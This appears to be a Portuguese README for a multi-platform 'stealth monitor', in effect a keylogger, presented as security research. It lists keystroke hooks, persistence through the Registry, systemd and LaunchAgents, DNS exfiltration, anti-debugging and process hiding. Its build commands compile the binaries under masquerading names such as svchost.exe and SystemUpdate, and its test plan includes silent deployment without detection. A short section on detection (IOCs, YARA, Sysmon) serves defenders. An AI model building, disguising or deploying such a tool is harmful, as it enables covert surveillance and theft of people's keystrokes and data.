Monitor de eventos de baixo nível para pesquisa em segurança cibernética, desenvolvido para Windows, Linux e macOS usando apenas APIs nativas.
Este projeto é destinado EXCLUSIVAMENTE para:
- 🎓 Pesquisa acadêmica em segurança cibernética
- 🔵 Treinamento de Blue Team (detecção e resposta)
- 🔴 Treinamento de Red Team (técnicas de evasão)
- 🧪 Análise científica de comportamento de sistemas
- 📚 Fins educacionais em ambientes controlados
🚨 NÃO USE PARA ATIVIDADES ILEGAIS! 🚨
stealth-monitor/
├── common/ # Código compartilhado
│ ├── crypto.h # Criptografia XOR/AES
│ └── stealth.h # Anti-detecção
├── windows/ # Implementação Windows
│ └── win_stealth_monitor.c
├── linux/ # Implementação Linux
│ └── linux_stealth_monitor.c
├── macos/ # Implementação macOS
│ └── macos_stealth_monitor.c
├── build/ # Scripts de compilação
│ └── build_all.sh
└── research/ # Documentação científica
└── detection_techniques.md
- ✅ Hooks de baixo nível (WH_KEYBOARD_LL)
- ✅ Syscalls diretos (NtSetInformationProcess)
- ✅ Persistência via Registry + Scheduled Tasks
- ✅ Exfiltração via DNS queries
- ✅ Anti-debugging (IsDebuggerPresent, timing checks)
- ✅ Process hiding techniques
- ✅ X11 Record Extension hooks
- ✅ Daemonização completa
- ✅ Persistência via systemd
- ✅ Anti-debugging (/proc/self/status)
- ✅ Process name obfuscation
- ✅ Stealth file operations
- ✅ Core Graphics Event Taps
- ✅ LaunchAgent persistence
- ✅ Accessibility API usage
- ✅ Anti-VM detection
- ✅ App bundle creation
- ✅ System integration
cd build
./build_all.shcd windows
x86_64-w64-mingw32-gcc -O3 -s -mwindows -static \
-o svchost.exe win_stealth_monitor.c \
-luser32 -lkernel32 -ladvapi32 -lpsapi -lws2_32cd linux
gcc -O3 -s -o system-monitor linux_stealth_monitor.c \
-lX11 -lXtst -lXext -lpthreadcd macos
clang -O3 -framework CoreFoundation -framework CoreGraphics \
-framework ApplicationServices -framework Carbon \
-o SystemUpdate macos_stealth_monitor.c# Estudar técnicas de evasão
# Analisar métodos de persistência
# Compreender exfiltração de dados
# Desenvolver payloads stealth# Identificar IOCs (Indicators of Compromise)
# Desenvolver regras de detecção
# Testar ferramentas de monitoramento
# Criar contramedidas eficazes- Processos com nomes genéricos em locais não padrão
- Hooks de baixo nível em APIs críticas
- Queries DNS suspeitas com dados codificados
- Modificações em chaves de persistência
- Uso anômalo de APIs de acessibilidade
- Sysmon com configuração específica
- YARA rules para detecção de padrões
- EDR com queries customizadas
- Wireshark para análise de tráfego
- Volatility para análise de memória
- Taxa de detecção por diferentes AVs
- Tempo de permanência no sistema
- Sucesso de exfiltração de dados
- Eficácia de técnicas anti-debugging
- Tempo médio de detecção (MTTD)
- Taxa de falsos positivos/negativos
- Cobertura de técnicas MITRE ATT&CK
- Eficácia de resposta automatizada
# VMs isoladas para cada SO
# Ferramentas de monitoramento instaladas
# Ambiente de rede controlado
# Logs centralizados
# Snapshots para reset rápido- Deploy silencioso - Testar instalação sem detecção
- Persistência - Verificar sobrevivência a reinicializações
- Exfiltração - Analisar métodos de saída de dados
- Detecção - Identificar com ferramentas Blue Team
- Resposta - Testar procedimentos de contenção
research/detection_techniques.md- Técnicas de detecção Blue Teamresearch/usage_guide.md- Guia de uso científicoresearch/techniques.md- Análise técnica detalhada
- APIs de baixo nível em diferentes SOs
- Técnicas de evasão e anti-detecção
- Métodos de persistência multiplataforma
- Exfiltração por canais não convencionais
- Desenvolvimento de contramedidas
- Programação em C para sistemas
- Análise de malware e reverse engineering
- Desenvolvimento de regras de detecção
- Resposta a incidentes de segurança
- Pesquisa em segurança cibernética
Este é um projeto científico aberto para:
- Pesquisadores em segurança
- Estudantes de ciência da computação
- Profissionais de Blue/Red Team
- Desenvolvedores de ferramentas de segurança
Projeto desenvolvido para fins educacionais e de pesquisa. Use com responsabilidade e dentro da legalidade.
🔬 "A ciência da computação não é sobre computadores, assim como a astronomia não é sobre telescópios." - Edsger Dijkstra